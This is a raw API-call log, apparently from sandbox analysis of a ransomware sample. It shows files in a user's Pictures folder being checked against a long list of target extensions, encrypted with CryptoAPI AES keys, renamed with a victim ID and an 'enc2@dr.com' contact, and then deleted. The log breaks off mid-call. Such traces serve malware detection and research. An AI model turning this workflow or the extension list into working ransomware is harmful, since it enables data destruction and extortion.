	[0196.764] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hg1HF_Lrt.png", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png") returned 0x39
	[0196.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.764] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.765] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png"
	[0196.765] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png") returned 57
	[0196.765] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.765] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0196.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.766] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.766] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.766] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.766] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.769] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x48bf, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x48bf, lpOverlapped=0x0) returned 1
	[0196.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.772] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb220) returned 1
	[0196.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.774] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0196.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.774] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.774] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9330) returned 1
	[0196.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.774] CryptEncrypt (in: hKey=0xfb9330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x48bf, dwBufLen=0x48bf | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x48c0) returned 1
	[0196.775] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.775] RtlMoveMemory (in: Destination=0xfe1a48, Source=0xfdd180, Length=0x48bf | out: Destination=0xfe1a48) 
	[0196.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.776] CryptEncrypt (in: hKey=0xfb9330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1a48*, pdwDataLen=0x18aefc*=0x48bf, dwBufLen=0x48c0 | out: pbData=0xfe1a48*, pdwDataLen=0x18aefc*=0x48c0) returned 1
	[0196.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.776] CryptDestroyKey (hKey=0xfb9330) returned 1
	[0196.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.776] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0196.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.777] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0196.777] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.777] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.777] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0196.778] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 99
	[0196.779] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0196.779] WriteFile (in: hFile=0x388, lpBuffer=0xfe1a48*, nNumberOfBytesToWrite=0x48c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe1a48*, lpNumberOfBytesWritten=0x18b358*=0x48c0, lpOverlapped=0x0) returned 1
	[0196.782] CloseHandle (hObject=0x388) returned 1
	[0196.782] CloseHandle (hObject=0x2c0) returned 1
	[0196.782] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png")) returned 1
	[0197.181] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg1hf_lrt.png")) returned 0
	[0197.181] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b9f94b0, ftCreationTime.dwHighDateTime=0x1d96beb, ftLastAccessTime.dwLowDateTime=0x54cb2940, ftLastAccessTime.dwHighDateTime=0x1d96ea5, ftLastWriteTime.dwLowDateTime=0x54cb2940, ftLastWriteTime.dwHighDateTime=0x1d96ea5, nFileSizeHigh=0x0, nFileSizeLow=0x11ad4, dwReserved0=0x0, dwReserved1=0x0, cFileName="hg5hwqeCsvIcbR7X.gif", cAlternateFileName="HG5HWQ~1.GIF")) returned 1
	[0197.181] lstrcmpW (lpString1="hg5hwqeCsvIcbR7X.gif", lpString2="..") returned 1
	[0197.181] lstrcmpW (lpString1="hg5hwqeCsvIcbR7X.gif", lpString2=".") returned 1
	[0197.181] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.181] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="hg5hwqeCsvIcbR7X.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\hg5hwqeCsvIcbR7X.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\hg5hwqeCsvIcbR7X.gif"
	[0197.181] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\hg5hwqeCsvIcbR7X.gif") returned 64
	[0197.181] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.248] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\hg5hwqeCsvIcbR7X.gif", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif") returned 0x40
	[0197.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.248] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.248] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif"
	[0197.248] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif") returned 64
	[0197.248] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.249] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0197.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.249] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") 